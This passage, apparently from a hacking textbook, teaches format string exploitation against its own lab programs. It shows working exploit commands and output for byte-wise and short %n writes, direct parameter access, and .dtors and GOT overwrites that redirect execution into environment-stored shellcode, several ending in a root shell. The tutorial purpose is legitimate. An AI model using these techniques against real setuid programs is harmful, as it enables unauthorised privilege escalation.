reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\

xf6\

x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n

The right way to print user-controlled input:

??JUNK??JUNK??JUNK??%x%x%161x%n

The wrong way to print user-controlled input:

??JUNK??JUNK??JUNK??bffff3b0b7fe75fc

0

[*] test_val @ 0x080497f4 = 205 0x000000cd

[*] next_val @ 0x080497f8 = 286331153 0x11111111

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xab - 0xcd"

$1 = -34

reader@hacking:~/booksrc $

Instead of trying to subtract 34 from 205, the least significant byte is just wrapped around to 0x1AB by adding 222 to 205 to produce 427, which is the decimal representation of 0x1AB. This technique can be used to wrap around again and set the least significant byte to 0x06 for the third write.

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x1ab - 0xcd"

$1 = 222

reader@hacking:~/booksrc $ gdb -q --batch -ex "p /d 0x1ab"

$1 = 427

reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\

xf6\

x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n

The right way to print user-controlled input:

??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n

The wrong way to print user-controlled input:

??JUNK??JUNK??JUNK??bffff3b0b7fe75fc

0

4b4e554a

[*] test_val @ 0x080497f4 = 109517 0x0001abcd

[*] next_val @ 0x080497f8 = 286331136 0x11111100

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x06 - 0xab"

$1 = -165

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x106 - 0xab"

$1 = 91

reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\

xf6\

x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n

The right way to print user-controlled input:

??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n

The wrong way to print user-controlled input:

??JUNK??JUNK??JUNK??bffff3b0b7fe75fc

0

4b4e554a

4b4e554a

[*] test_val @ 0x080497f4 = 33991629 0x0206abcd

[*] next_val @ 0x080497f8 = 286326784 0x11110000

reader@hacking:~/booksrc $

With each write, bytes of the next_val variable, adjacent to test_val, are being overwritten. The wraparound technique seems to be working fine, but a slight problem manifests itself as the final byte is attempted.

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x08 - 0x06"

$1 = 2

reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\

xf6\

x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n%2x%n

The right way to print user-controlled input:

??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n%2x%n

The wrong way to print user-controlled input:

??JUNK??JUNK??JUNK??bffff3a0b7fe75fc

0

4b4e554a

4b4e554a4b4e554a

[*] test_val @ 0x080497f4 = 235318221 0x0e06abcd

[*] next_val @ 0x080497f8 = 285212674 0x11000002

reader@hacking:~/booksrc $

What happened here? The difference between 0x06 and 0x08 is only two, but eight bytes are output, resulting in the byte 0x0e being written by the %nformat parameter, instead. This is because the field width option for the %xformat parameter is only a minimum field width, and eight bytes of data were output. This problem can be alleviated by simply wrapping around again; however, it's good to know the limitations of the field width option.

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x108 - 0x06"

$1 = 258

reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\

xf6\

x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n%258x%n

The right way to print user-controlled input:

??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n%258x%n

The wrong way to print user-controlled input:

??JUNK??JUNK??JUNK??bffff3a0b7fe75fc

0

4b4e554a

4b4e554a

4b4e554a

[*] test_val @ 0x080497f4 = 134654925 0x0806abcd

[*] next_val @ 0x080497f8 = 285212675 0x11000003

reader@hacking:~/booksrc $

Just like before, the appropriate addresses and junk data are put in the beginning of the format string, and the least significant byte is controlled for four write operations to overwrite all four bytes of the variable test_val. Any value subtractions to the least significant byte can be accomplished by wrapping the byte around. Also, any additions less than eight may need to be wrapped around in a similar fashion.

Direct Parameter Access

Direct parameter access is a way to simplify format string exploits. In the previous exploits, each of the format parameter arguments had to be stepped through sequentially. This necessitated using several %x format parameters to step through parameter arguments until the beginning of the format string was reached. In addition, the sequential nature required three 4-byte words of junk to properly write a full address to an arbitrary memory location.

As the name would imply, direct parameter access allows parameters to be accessed directly by using the dollar sign qualifier. For example, %n$d would access the nth parameter and display it as a decimal number.

printf("7th: %7$d, 4th: %4$05d \n", 10, 20, 30, 40, 50, 60, 70, 80);

The preceding printf() call would have the following output:

7th: 70, 4th: 00040

First, the 70 is outputted as a decimal number when the format parameter of %7$d is encountered, because the seventh parameter is 70. The second format parameter accesses the fourth parameter and uses a field width option of 05. All of the other parameter arguments are untouched. This method of direct access eliminates the need to step through memory until the beginning of the format string is located, since this memory can be accessed directly. The following output shows the use of direct parameter access.

reader@hacking:~/booksrc $ ./fmt_vuln AAAA%x%x%x%x

The right way to print user-controlled input:

AAAA%x%x%x%x

The wrong way to print user-controlled input:

AAAAbffff3d0b7fe75fc041414141

[*] test_val @ 0x08049794 = -72 0xffffffb8

reader@hacking:~/booksrc $ ./fmt_vuln AAAA%4\$x

The right way to print user-controlled input:

AAAA%4$x

The wrong way to print user-controlled input:

AAAA41414141

[*] test_val @ 0x08049794 = -72 0xffffffb8

reader@hacking:~/booksrc $

In this example, the beginning of the format string is located at the fourth parameter argument. Instead of stepping through the first three parameter arguments using %x format parameters, this memory can be accessed directly. Since this is being done on the command line and the dollar sign is a special character, it must be escaped with a backslash. This just tells the command shell to avoid trying to interpret the dollar sign as a special character. The actual format string can be seen when it is printed correctly.

Direct parameter access also simplifies the writing of memory addresses. Since memory can be accessed directly, there's no need for four-byte spacers of junk data to increment the byte output count. Each of the %x format parameters that usually performs this function can just directly access a piece of memory found before the format string. For practice, let's use direct parameter access to write a more realistic-looking address of 0xbffffd72 into the variable test_vals.

reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "\x94\x97\x04\x08" . "\x95\x97\x04\

x08"

. "\x96\x97\x04\x08" . "\x97\x97\x04\x08"')%4\$n

The right way to print user-controlled input:

????????%4$n

The wrong way to print user-controlled input:

????????

[*] test_val @ 0x08049794 = 16 0x00000010

reader@hacking:~/booksrc $ gdb -q

(gdb) p 0x72 - 16

$1 = 98

(gdb) p 0xfd - 0x72

$2 = 139

(gdb) p 0xff - 0xfd

$3 = 2

(gdb) p 0x1ff - 0xfd

$4 = 258

(gdb) p 0xbf - 0xff

$5 = -64

(gdb) p 0x1bf - 0xff

$6 = 192

(gdb) quit

reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "\x94\x97\x04\x08" . "\x95\x97\x04\

x08"

. "\x96\x97\x04\x08" . "\x97\x97\x04\x08"')%98x%4\$n%139x%5\$n

The right way to print user-controlled input:

????????%98x%4$n%139x%5$n

The wrong way to print user-controlled input:

????????

bffff3c0

b7fe75fc

[*] test_val @ 0x08049794 = 64882 0x0000fd72

reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "\x94\x97\x04\x08" . "\x95\x97\x04\

x08"

. "\x96\x97\x04\x08" . "\x97\x97\x04\x08"')%98x%4\$n%139x%5\$n%258x%6\$n%192x%7\$n

The right way to print user-controlled input:

????????%98x%4$n%139x%5$n%258x%6$n%192x%7$n

The wrong way to print user-controlled input:

????????

bffff3b0

b7fe75fc

0

8049794

[*] test_val @ 0x08049794 = -1073742478 0xbffffd72

reader@hacking:~/booksrc $

Since the stack doesn't need to be printed to reach our addresses, the number of bytes written at the first format parameter is 16. Direct parameter access is only used for the %n parameters, since it really doesn't matter what values are used for the %x spacers. This method simplifies the process of writing an address and shrinks the mandatory size of the format string.

Using Short Writes

Another technique that can simplify format string exploits is using short writes. A short is typically a two-byte word, and format parameters have a special way of dealing with them. A more complete description of possible format parameters can be found in the printf manual page. The portion describing the length modifier is shown in the output below.

The length modifier

Here, integer conversion stands for d, i, o, u, x, or X conversion.

h A following integer conversion corresponds to a short int or

unsigned short int argument, or a following n conversion

corresponds to a pointer to a short int argument.

This can be used with format string exploits to write two-byte shorts. In the output below, a short (shown in bold) is written in at both ends of the four-byte test_val variable. Naturally, direct parameter access can still be used.

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%x%hn

The right way to print user-controlled input:

??%x%x%x%hn

The wrong way to print user-controlled input:

??bffff3d0b7fe75fc0

[*] test_val @ 0x08049794 = -65515 0xffff 0015

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x97\x04\x08")%x%x%x%hn

The right way to print user-controlled input:

??%x%x%x%hn

The wrong way to print user-controlled input:

??bffff3d0b7fe75fc0

[*] test_val @ 0x08049794 = 1441720 0x0015ffb8

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x97\x04\x08")%4\$hn

The right way to print user-controlled input:

??%4$hn

The wrong way to print user-controlled input:

??

[*] test_val @ 0x08049794 = 327608 0x0004ffb8

reader@hacking:~/booksrc $

Using short writes, an entire four-byte value can be overwritten with just two %hn parameters. In the example below, the test_val variable will be overwritten once again with the address 0xbffffd72.

reader@hacking:~/booksrc $ gdb -q

(gdb) p 0xfd72 - 8

$1 = 64874

(gdb) p 0xbfff - 0xfd72

$2 = -15731

(gdb) p 0x1bfff - 0xfd72

$3 = 49805

(gdb) quit

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08\x96\x97\x04\x08")

%64874x%4\

$hn%49805x%5\$hn

The right way to print user-controlled input:

????%64874x%4$hn%49805x%5$hn

The wrong way to print user-controlled input:

b7fe75fc

[*] test_val @ 0x08049794 = -1073742478 0xbffffd72

reader@hacking:~/booksrc $

The preceding example used a similar wraparound method to deal with the second write of 0xbfff being less than the first write of 0xfd72. Using short writes, the order of the writes doesn't matter, so the first write can be 0xfd72and the second 0xbfff, if the two passed addresses are swapped in position. In the output below, the address 0x08049796 is written to first, and 0x08049794 is written to second.

(gdb) p 0xbfff - 8

$1 = 49143

(gdb) p 0xfd72 - 0xbfff

$2 = 15731

(gdb) quit

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x97\x04\x08\x94\x97\x04\x08")

%49143x%4\

$hn%15731x%5\$hn

The right way to print user-controlled input:

????%49143x%4$hn%15731x%5$hn

The wrong way to print user-controlled input:

????

b7fe75fc

[*] test_val @ 0x08049794 = -1073742478 0xbffffd72

reader@hacking:~/booksrc $

The ability to overwrite arbitrary memory addresses implies the ability to control the execution flow of the program. One option is to overwrite the return address in the most recent stack frame, as was done with the stack-based overflows. While this is a possible option, there are other targets that have more predictable memory addresses. The nature of stack-based overflows only allows the overwrite of the return address, but format strings provide the ability to overwrite any memory address, which creates other possibilities.

Detours with .dtors

In binary programs compiled with the GNU C compiler, special table sections called .dtors and .ctors are made for destructors and constructors, respectively. Constructor functions are executed before the main() function is executed, and destructor functions are executed just before the main() function exits with an exit system call. The destructor functions and the .dtors table section are of particular interest.

A function can be declared as a destructor function by defining the destructor attribute, as seen in dtors_sample.c.

dtors_sample.c

#include <stdio.h>

#include <stdlib.h>

static void cleanup(void) __attribute__ ((destructor));

main() {

printf("Some actions happen in the main() function..\n");

printf("and then when main() exits, the destructor is called..\n");

exit(0);

}

void cleanup(void) {

printf("In the cleanup function now..\n");

}

In the preceding code sample, the cleanup() function is defined with the destructor attribute, so the function is automatically called when the main() function exits, as shown next.

reader@hacking:~/booksrc $ gcc -o dtors_sample dtors_sample.c

reader@hacking:~/booksrc $ ./dtors_sample

Some actions happen in the main() function..

and then when main() exits, the destructor is called..

In the cleanup() function now..

reader@hacking:~/booksrc $

This behavior of automatically executing a function on exit is controlled by the .dtors table section of the binary. This section is an array of 32-bit addresses terminated by a NULL address. The array always begins with 0xffffffff and ends with the NULL address of 0x00000000. Between these two are the addresses of all the functions that have been declared with the destructor attribute.

The nm command can be used to find the address of the cleanup() function, and objdump can be used to examine the sections of the binary.

reader@hacking:~/booksrc $ nm ./dtors_sample

080495bc d _DYNAMIC

08049688 d _GLOBAL_OFFSET_TABLE_

080484e4 R _IO_stdin_used

w _Jv_RegisterClasses

080495a8 d __CTOR_END__

080495a4 d __CTOR_LIST__

080495b4 d __DTOR_END__

080495ac d __DTOR_LIST__

080485a0 r __FRAME_END__

080495b8 d __JCR_END__

080495b8 d __JCR_LIST__

080496b0 A __bss_start

080496a4 D __data_start

08048480 t __do_global_ctors_aux

08048340 t __do_global_dtors_aux

080496a8 D __dso_handle

w __gmon_start__

08048479 T __i686.get_pc_thunk.bx

080495a4 d __init_array_end

080495a4 d __init_array_start

08048400 T __libc_csu_fini

08048410 T __libc_csu_init

U __libc_start_main@@GLIBC_2.0

080496b0 A _edata

080496b4 A _end

080484b0 T _fini

080484e0 R _fp_hw

0804827c T _init

080482f0 T _start

08048314 t call_gmon_start

080483e8 t cleanup

080496b0 b completed.1

080496a4 W data_start

U exit@@GLIBC_2.0

08048380 t frame_dummy

080483b4 T main

080496ac d p.0

U printf@@GLIBC_2.0

reader@hacking:~/booksrc $

The nm command shows that the cleanup() function is located at 0x080483e8 (shown in bold above). It also reveals that the .dtors section starts at 0x080495ac with __DTOR_LIST__ and ends at 0x080495b4 with __DTOR_END__( ). This means that 0x080495ac should contain 0xffffffff, 0x080495b4 should contain 0x00000000, and the address between them (0x080495b0) should contain the address of the cleanup() function (0x080483e8).

The objdump command shows the actual contents of the .dtors section (shown in bold below), although in a slightly confusing format. The first value of 80495ac is simply showing the address where the .dtors section is located. Then the actual bytes are shown, opposed to DWORDs, which means the bytes are reversed. Bearing this in mind, everything appears to be correct.

reader@hacking:~/booksrc $ objdump -s -j .dtors ./dtors_sample

./dtors_sample: file format elf32-i386

Contents of section .dtors:

80495ac ffffffff e8830408 00000000 ............

reader@hacking:~/booksrc $

An interesting detail about the .dtors section is that it is writable. An object dump of the headers will verify this by showing that the .dtors section isn't labeled READONLY.

reader@hacking:~/booksrc $ objdump -h ./dtors_sample

./dtors_sample: file format elf32-i386

Sections:

Idx Name Size VMA LMA File off Algn

0 .interp 00000013 08048114 08048114 00000114 2**0

CONTENTS, ALLOC, LOAD, READONLY, DATA

1 .note.ABI-tag 00000020 08048128 08048128 00000128 2**2

CONTENTS, ALLOC, LOAD, READONLY, DATA

2 .hash 0000002c 08048148 08048148 00000148 2**2

CONTENTS, ALLOC, LOAD, READONLY, DATA

3 .dynsym 00000060 08048174 08048174 00000174 2**2

CONTENTS, ALLOC, LOAD, READONLY, DATA

4 .dynstr 00000051 080481d4 080481d4 000001d4 2**0

CONTENTS, ALLOC, LOAD, READONLY, DATA

5 .gnu.version 0000000c 08048226 08048226 00000226 2**1

CONTENTS, ALLOC, LOAD, READONLY, DATA

6 .gnu.version_r 00000020 08048234 08048234 00000234 2**2

CONTENTS, ALLOC, LOAD, READONLY, DATA

7 .rel.dyn 00000008 08048254 08048254 00000254 2**2

CONTENTS, ALLOC, LOAD, READONLY, DATA

8 .rel.plt 00000020 0804825c 0804825c 0000025c 2**2

CONTENTS, ALLOC, LOAD, READONLY, DATA

9 .init 00000017 0804827c 0804827c 0000027c 2**2

CONTENTS, ALLOC, LOAD, READONLY, CODE

10 .plt 00000050 08048294 08048294 00000294 2**2

CONTENTS, ALLOC, LOAD, READONLY, CODE

11 .text 000001c0 080482f0 080482f0 000002f0 2**4

CONTENTS, ALLOC, LOAD, READONLY, CODE

12 .fini 0000001c 080484b0 080484b0 000004b0 2**2

CONTENTS, ALLOC, LOAD, READONLY, CODE

13 .rodata 000000bf 080484e0 080484e0 000004e0 2**5

CONTENTS, ALLOC, LOAD, READONLY, DATA

14 .eh_frame 00000004 080485a0 080485a0 000005a0 2**2

CONTENTS, ALLOC, LOAD, READONLY, DATA

15 .ctors 00000008 080495a4 080495a4 000005a4 2**2

CONTENTS, ALLOC, LOAD, DATA

16 .dtors 0000000c 080495ac 080495ac 000005ac 2**2

CONTENTS, ALLOC, LOAD, DATA

17 .jcr 00000004 080495b8 080495b8 000005b8 2**2

CONTENTS, ALLOC, LOAD, DATA

18 .dynamic 000000c8 080495bc 080495bc 000005bc 2**2

CONTENTS, ALLOC, LOAD, DATA

19 .got 00000004 08049684 08049684 00000684 2**2

CONTENTS, ALLOC, LOAD, DATA

20 .got.plt 0000001c 08049688 08049688 00000688 2**2

CONTENTS, ALLOC, LOAD, DATA

21 .data 0000000c 080496a4 080496a4 000006a4 2**2

CONTENTS, ALLOC, LOAD, DATA

22 .bss 00000004 080496b0 080496b0 000006b0 2**2

ALLOC

23 .comment 0000012f 00000000 00000000 000006b0 2**0

CONTENTS, READONLY

24 .debug_aranges 00000058 00000000 00000000 000007e0 2**3

CONTENTS, READONLY, DEBUGGING

25 .debug_pubnames 00000025 00000000 00000000 00000838 2**0

CONTENTS, READONLY, DEBUGGING

26 .debug_info 000001ad 00000000 00000000 0000085d 2**0

CONTENTS, READONLY, DEBUGGING

27 .debug_abbrev 00000066 00000000 00000000 00000a0a 2**0

CONTENTS, READONLY, DEBUGGING

28 .debug_line 0000013d 00000000 00000000 00000a70 2**0

CONTENTS, READONLY, DEBUGGING

29 .debug_str 000000bb 00000000 00000000 00000bad 2**0

CONTENTS, READONLY, DEBUGGING

30 .debug_ranges 00000048 00000000 00000000 00000c68 2**3

CONTENTS, READONLY, DEBUGGING

reader@hacking:~/booksrc $

Another interesting detail about the .dtors section is that it is included in all binaries compiled with the GNU C compiler, regardless of whether any functions were declared with the destructor attribute. This means that the vulnerable format string program, fmt_vuln.c, must have a .dtors section containing nothing. This can be inspected using nm and objdump.

reader@hacking:~/booksrc $ nm ./fmt_vuln | grep DTOR

08049694 d __DTOR_END__

08049690 d __DTOR_LIST__

reader@hacking:~/booksrc $ objdump -s -j .dtors ./fmt_vuln

./fmt_vuln: file format elf32-i386

Contents of section .dtors:

8049690 ffffffff 00000000 ........

reader@hacking:~/booksrc $

As this output shows, the distance between __DTOR_LIST__ and __DTOR_END__ is only four bytes this time, which means there are no addresses between them. The object dump verifies this.

Since the .dtors section is writable, if the address after the 0xffffffff is overwritten with a memory address, the program's execution flow will be directed to that address when the program exits. This will be the address of __DTOR_LIST__ plus four, which is 0x08049694 (which also happens to be the address of __DTOR_END__ in this case).

If the program is suid root, and this address can be overwritten, it will be possible to obtain a root shell.

reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin)

reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./fmt_vuln

SHELLCODE will be at 0xbffff9ec

reader@hacking:~/booksrc $

Shellcode can be put into an environment variable, and the address can be predicted as usual. Since the program name lengths of the helper program getenvaddr.c and the vulnerable fmt_vuln.c program differ by two bytes, the shellcode will be located at 0xbffff9ec when fmt_vuln.c is executed. This address simply has to be written into the .dtors section at 0x08049694 (shown in bold below) using the format string vulnerability. In the output below the short write method is used.

reader@hacking:~/booksrc $ gdb -q

(gdb) p 0xbfff - 8

$1 = 49143

(gdb) p 0xf9ec - 0xbfff

$2 = 14829

(gdb) quit

reader@hacking:~/booksrc $ nm ./fmt_vuln | grep DTOR

08049694 d __DTOR_END__

08049690 d __DTOR_LIST__

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x96\x04\x08\x94\x96\x04\

x08")%49143x%4\$hn%14829x%5\$hn

The right way to print user-controlled input:

????%49143x%4$hn%14829x%5$hn

The wrong way to print user-controlled input:

????

b7fe75fc

[*] test_val @ 0x08049794 = -72 0xffffffb8

sh-3.2# whoami

root

sh-3.2#

Even though the .dtors section isn't properly terminated with a NULL address of 0x00000000, the shellcode address is still considered to be a destructor function. When the program exits, the shellcode will be called, spawning a root shell.

Another notesearch Vulnerability

In addition to the buffer overflow vulnerability, the notesearch program from Chapter 0x200 also suffers from a format string vulnerability. This vulnerability is shown in bold in the code listing below.

int print_notes(int fd, int uid, char *searchstring) {

int note_length;

char byte=0, note_buffer[100];

note_length = find_user_note(fd, uid);

if(note_length == -1) // If end of file reached,

return 0; // return 0.

read(fd, note_buffer, note_length); // Read note data.

note_buffer[note_length] = 0; // Terminate the string.

if(search_note(note_buffer, searchstring)) // If searchstring found,

printf(note_buffer); // print the note.

return 1;

}

This function reads the note_buffer from the file and prints the contents of the note without supplying its own format string. While this buffer can't be directly controlled from the command line, the vulnerability can be exploited by sending exactly the right data to the file using the notetaker program and then opening that note using the notesearch program. In the following output, the notetaker program is used to create notes to probe memory in the notesearch program. This tells us that the eighth function parameter is at the beginning of the buffer.

reader@hacking:~/booksrc $ ./notetaker AAAA$(perl -e 'print "%x."x10')

[DEBUG] buffer @ 0x804a008: 'AAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.'

[DEBUG] datafile @ 0x804a070: '/var/notes'

[DEBUG] file descriptor is 3

Note has been saved.

reader@hacking:~/booksrc $ ./notesearch AAAA

[DEBUG] found a 34 byte note for user id 999

[DEBUG] found a 41 byte note for user id 999

[DEBUG] found a 5 byte note for user id 999

[DEBUG] found a 35 byte note for user id 999

AAAAbffff750.23.20435455.37303032.0.0.1.41414141.252e7825.78252e78 .

-------[ end of note data ]-------

reader@hacking:~/booksrc $ ./notetaker BBBB%8\$x

[DEBUG] buffer @ 0x804a008: 'BBBB%8$x'

[DEBUG] datafile @ 0x804a070: '/var/notes'

[DEBUG] file descriptor is 3

Note has been saved.

reader@hacking:~/booksrc $ ./notesearch BBBB

[DEBUG] found a 34 byte note for user id 999

[DEBUG] found a 41 byte note for user id 999

[DEBUG] found a 5 byte note for user id 999

[DEBUG] found a 35 byte note for user id 999

[DEBUG] found a 9 byte note for user id 999

BBBB42424242

-------[ end of note data ]-------

reader@hacking:~/booksrc $

Now that the relative layout of memory is known, exploitation is just a matter of overwriting the .dtors section with the address of injected shellcode.

reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin)

reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch

SHELLCODE will be at 0xbffff9e8

reader@hacking:~/booksrc $ gdb -q

(gdb) p 0xbfff - 8

$1 = 49143

(gdb) p 0xf9e8 - 0xbfff

$2 = 14825

(gdb) quit

reader@hacking:~/booksrc $ nm ./notesearch | grep DTOR

08049c60 d __DTOR_END__

08049c5c d __DTOR_LIST__

reader@hacking:~/booksrc $ ./notetaker $(printf "\x62\x9c\x04\x08\x60\x9c\x04\

x08")%49143x%8\$hn%14825x%9\$hn

[DEBUG] buffer @ 0x804a008: 'b?`?%49143x%8$hn%14825x%9$hn'

[DEBUG] datafile @ 0x804a070: '/var/notes'

[DEBUG] file descriptor is 3

Note has been saved.

reader@hacking:~/booksrc $ ./notesearch 49143x

[DEBUG] found a 34 byte note for user id 999

[DEBUG] found a 41 byte note for user id 999

[DEBUG] found a 5 byte note for user id 999

[DEBUG] found a 35 byte note for user id 999

[DEBUG] found a 9 byte note for user id 999

[DEBUG] found a 33 byte note for user id 999

21

-------[ end of note data ]-------

sh-3.2# whoami

root

sh-3.2#

Overwriting the Global Offset Table

Since a program could use a function in a shared library many times, it's useful to have a table to reference all the functions. Another special section in compiled programs is used for this purpose—the procedure linkage table (PLT).

This section consists of many jump instructions, each one corresponding to the address of a function. It works like a springboard—each time a shared function needs to be called, control will pass through the PLT.

An object dump disassembling the PLT section in the vulnerable format string program (fmt_vuln.c) shows these jump instructions:

reader@hacking:~/booksrc $ objdump -d -j .plt ./fmt_vuln

./fmt_vuln: file format elf32-i386

Disassembly of section .plt:

080482b8 <__gmon_start__@plt-0x10>:

80482b8: ff 35 6c 97 04 08 pushl 0x804976c

80482be: ff 25 70 97 04 08 jmp *0x8049770

80482c4: 00 00 add %al,(%eax)

...

080482c8 <__gmon_start__@plt>:

80482c8: ff 25 74 97 04 08 jmp *0x8049774

80482ce: 68 00 00 00 00 push $0x0

80482d3: e9 e0 ff ff ff jmp 80482b8 <_init+0x18>

080482d8 <__libc_start_main@plt>:

80482d8: ff 25 78 97 04 08 jmp *0x8049778

80482de: 68 08 00 00 00 push $0x8

80482e3: e9 d0 ff ff ff jmp 80482b8 <_init+0x18>

080482e8 <strcpy@plt>:

80482e8: ff 25 7c 97 04 08 jmp *0x804977c

80482ee: 68 10 00 00 00 push $0x10

80482f3: e9 c0 ff ff ff jmp 80482b8 <_init+0x18>

080482f8 <printf@plt>:

80482f8: ff 25 80 97 04 08 jmp *0x8049780

80482fe: 68 18 00 00 00 push $0x18

8048303: e9 b0 ff ff ff jmp 80482b8 <_init+0x18>

08048308 <exit@plt>:

8048308: ff 25 84 97 04 08 jmp *0x8049784

804830e: 68 20 00 00 00 push $0x20

8048313: e9 a0 ff ff ff jmp 80482b8 <_init+0x18>

reader@hacking:~/booksrc $

One of these jump instructions is associated with the exit() function, which is called at the end of the program. If the jump instruction used for the exit() function can be manipulated to direct the execution flow into shellcode instead of the exit() function, a root shell will be spawned. Below, the procedure linking table is shown to be read only.

reader@hacking:~/booksrc $ objdump -h ./fmt_vuln | grep -A1 "\ .plt\ "

10 .plt 00000060 080482b8 080482b8 000002b8 2**2

CONTENTS, ALLOC, LOAD, READONLY, CODE

But closer examination of the jump instructions (shown in bold below) reveals that they aren't jumping to addresses but to pointers to addresses. For example, the actual address of the printf() function is stored as a pointer at the memory address 0x08049780, and the exit() function's address is stored at 0x08049784.

080482f8 <printf@plt>:

80482f8: ff 25 80 97 04 08 jmp *0x8049780

80482fe: 68 18 00 00 00 push $0x18

8048303: e9 b0 ff ff ff jmp 80482b8 <_init+0x18>

08048308 <exit@plt>:

8048308: ff 25 84 97 04 08 jmp *0x8049784

804830e: 68 20 00 00 00 push $0x20

8048313: e9 a0 ff ff ff jmp 80482b8 <_init+0x18>

These addresses exist in another section, called the global offset table (GOT), which is writable. These addresses can be directly obtained by displaying the dynamic relocation entries for the binary by using objdump.

reader@hacking:~/booksrc $ objdump -R ./fmt_vuln

./fmt_vuln: file format elf32-i386

DYNAMIC RELOCATION RECORDS

OFFSET TYPE VALUE

08049764 R_386_GLOB_DAT __gmon_start__

08049774 R_386_JUMP_SLOT __gmon_start__

08049778 R_386_JUMP_SLOT __libc_start_main

0804977c R_386_JUMP_SLOT strcpy

08049780 R_386_JUMP_SLOT printf

08049784 R_386_JUMP_SLOT exit

reader@hacking:~/booksrc $

This reveals that the address of the exit() function (shown in bold above) is located in the GOT at 0x08049784. If the address of the shellcode is overwritten at this location, the program should call the shellcode when it thinks it's calling the exit() function.

As usual, the shellcode is put in an environment variable, its actual location is predicted, and the format string vulnerability is used to write the value. Actually, the shellcode should still be located in the environment from before, meaning that the only things that need adjustment are the first 16 bytes of the format string. The calculations for the %x format parameters will be done once again for clarity. In the output below, the address of the shellcode () is written into the address of the exit() function ().

reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin)

reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./fmt_vuln

SHELLCODE will be at 0xbffff9ec

reader@hacking:~/booksrc $ gdb -q

(gdb) p 0xbfff - 8

$1 = 49143

(gdb) p 0xf9ec - 0xbfff

$2 = 14829

(gdb) quit

reader@hacking:~/booksrc $ objdump -R ./fmt_vuln

./fmt_vuln: file format elf32-i386

DYNAMIC RELOCATION RECORDS

OFFSET TYPE VALUE

08049764 R_386_GLOB_DAT __gmon_start__

08049774 R_386_JUMP_SLOT __gmon_start__

08049778 R_386_JUMP_SLOT __libc_start_main

0804977c R_386_JUMP_SLOT strcpy

08049780 R_386_JUMP_SLOT printf

08049784 R_386_JUMP_SLOT exit

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x86\x97\x04\x08\x84\x97\x04\

x08")%49143x%4\$hn%14829x%5\$hn

The right way to print user-controlled input:

????%49143x%4$hn%14829x%5$hn

The wrong way to print user-controlled input:

????

b7fe75fc

[*] test_val @ 0x08049794 = -72 0xffffffb8

sh-3.2# whoami

root

sh-3.2#

When fmt_vuln.c tries to call the exit() function, the address of the exit() function is looked up in the GOT and is jumped to via the PLT. Since the actual address has been switched with the address for the shellcode in the environment, a root shell is spawned.

Another advantage of overwriting the GOT is that the GOT entries are fixed per binary, so a different system with the same binary will have the same GOT entry at the same address.

The ability to overwrite any arbitrary address opens up many possibilities for exploitation. Basically, any section of memory that is writable and contains an address that directs the flow of program execution can be targeted.